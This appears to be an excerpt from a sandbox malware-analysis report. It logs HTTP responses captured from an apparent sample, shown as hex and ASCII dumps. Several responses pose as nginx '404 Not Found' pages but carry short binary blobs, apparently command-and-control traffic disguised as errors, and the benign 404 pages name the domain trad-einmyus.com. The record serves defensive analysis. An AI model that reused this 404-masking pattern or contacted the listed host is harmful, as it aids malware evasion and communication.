Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a Data Ascii: 35I:82OQ%vYQ&e^J0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82O^9\HiSG0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:G@OdEH10
